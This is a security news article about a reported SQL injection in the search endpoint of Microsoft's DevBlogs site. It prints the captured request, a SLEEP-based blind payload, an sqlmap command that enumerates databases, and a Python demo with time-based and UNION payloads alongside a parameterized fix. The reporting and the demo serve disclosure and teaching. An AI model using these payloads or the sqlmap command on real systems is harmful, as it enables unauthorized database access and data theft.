SQL Injection Vulnerability in Microsoft DevBlogs Enables Malicious SQL


A security researcher recently discovered a critical SQL injection vulnerability on Microsoft’s DevBlogs site (https://devblogs.microsoft.com), allowing attackers to manipulate the database with malicious SQL queries, threatening platform security and data integrity.

SQL Injection Vulnerability

The vulnerability was found in the WordPress-based CMS behind DevBlogs, specifically in a POST request to the admin-ajax.php endpoint, which dispatches the site's asynchronous (AJAX) actions. The researcher's captured request (cookie value redacted):

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://devblogs.microsoft.com/
Cookie: VALUE
Content-Length: 17894
Accept-Encoding: gzip,deflate,br
User-Agent: NOTROBOT
Host: devblogs.microsoft.com
Connection: Keep-alive

action=load_more_results2&limit=10&offset=10&query=HELLO&search_term=the

The query parameter was injectable. A time-based blind payload such as (SELECT 4008 FROM (SELECT(SLEEP(5)))LDNk) makes the database pause for five seconds when the injected subquery is evaluated, so a response that arrives about five seconds late confirms that attacker-supplied SQL is being executed even though the page itself returns nothing useful. With that confirmed, the researcher showed the same injection point could be used to manipulate the underlying database queries.

The researcher then used sqlmap to enumerate database names and prove the impact. The saved request above was replayed with -r, --force-ssl kept the traffic on HTTPS, and -p query restricted testing to the injectable parameter:

sqlmap -r savedreqsql.txt --dbs --force-ssl -p query

revealed databases like information_schema, performance_schema, and wp_devblogs.

The researcher also found that the injection point supported error-based SQL injection, which is quicker to exploit than the initial time-based method because the extracted data comes back inside the database's error messages instead of having to be inferred one delay at a time.

After reporting the issue to Microsoft’s security team, researcher Zhenwarx received an unexpected response. Despite the severity of the flaw, the DevBlogs subdomain was marked “out of scope,” leaving the vulnerability unpatched at the time.

This highlights the critical need for proper input handling, above all parameterized queries (in WordPress, $wpdb->prepare()) instead of string concatenation, and for clear scope definitions in bug bounty programs.
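To make the mechanics concrete, the following example was added for this article; it is not code from DevBlogs, WordPress or the researcher. It rebuilds the pattern in Python on an in-memory SQLite database and assumes the handler interpolated the query parameter into a LIKE clause, which the write-up does not show. The post and user rows are constructed sample data, and a SLEEP() function is registered so the MySQL-style time-based payload from the report behaves the same way here. It shows the delayed response that confirms blind injection, a UNION payload that enumerates tables the way sqlmap's --dbs enumerated databases, and the parameterized rewrite that closes the hole.

```python
import sqlite3
import time


def make_db():
    """Constructed stand-in for the WordPress MySQL backend (sample rows, not real DevBlogs data)."""
    con = sqlite3.connect(":memory:")
    # MySQL has SLEEP(); register an equivalent so the report's time-based payload works here too.
    con.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
    con.executescript("""
        CREATE TABLE wp_posts (ID INTEGER, post_title TEXT);
        INSERT INTO wp_posts VALUES (1, 'Hello from the .NET blog'), (2, 'Say HELLO to C# 13');
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', 'constructed-hash');
    """)
    return con


def search_vulnerable(con, query, limit=10, offset=0):
    """Hypothetical load_more_results2 handler: the query parameter is concatenated into the SQL."""
    sql = ("SELECT post_title FROM wp_posts WHERE post_title LIKE '%" + query + "%' "
           "ORDER BY ID LIMIT " + str(limit) + " OFFSET " + str(offset))
    return [row[0] for row in con.execute(sql)]


def _esc_like(text):
    # Escape LIKE wildcards so user input matches literally (what $wpdb->esc_like() does in WordPress).
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(con, query, limit=10, offset=0):
    """Hardened handler: placeholders carry the values, so the input can never change the SQL."""
    sql = ("SELECT post_title FROM wp_posts WHERE post_title LIKE ? ESCAPE '\\' "
           "ORDER BY ID LIMIT ? OFFSET ?")
    params = ("%" + _esc_like(query) + "%", int(limit), int(offset))
    return [row[0] for row in con.execute(sql, params)]


def timed_search(con, query):
    """Run the vulnerable search and report how long the database took to answer."""
    start = time.perf_counter()
    rows = search_vulnerable(con, query)
    return rows, time.perf_counter() - start


# Payloads (the quoting context is an assumption). The SLEEP(5) subquery from the report,
# shortened to 0.3 s: the delay alone proves the injected SQL ran.
TIME_PAYLOAD = "HELLO%' AND (SELECT 4008 FROM (SELECT(SLEEP(0.3)))LDNk) AND '%'='"
# UNION payload: lists tables here the way sqlmap --dbs listed databases on the real target.
UNION_PAYLOAD = "HELLO%' UNION SELECT name FROM sqlite_master WHERE type='table' -- "


if __name__ == "__main__":
    con = make_db()
    _, baseline = timed_search(con, "HELLO")
    _, delayed = timed_search(con, TIME_PAYLOAD)
    print(f"baseline {baseline:.3f}s, with SLEEP payload {delayed:.3f}s: blind injection confirmed")
    print("vulnerable + UNION:", search_vulnerable(con, UNION_PAYLOAD))
    print("parameterized + UNION:", search_safe(con, UNION_PAYLOAD))
```

The vulnerable handler answers the UNION payload with table names alongside post titles, and the SLEEP payload holds the response for the requested interval; the parameterized handler treats both payloads as search text and returns nothing, because the database never sees them as SQL.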

DevBlogs, as a public-facing Microsoft subdomain, is a prime target for attackers. Organizations should regularly audit their security practices, especially custom theme and plugin code on WordPress installations, to prevent such vulnerabilities. There is hope Microsoft will reassess its scope and resolve the issue soon.


By FirstHackersNews | January 22nd, 2025 (2025-01-23T02:13:47+05:30) | Internet Security, malicious cyber actors, Security Advisory, Security Update, vulnerability
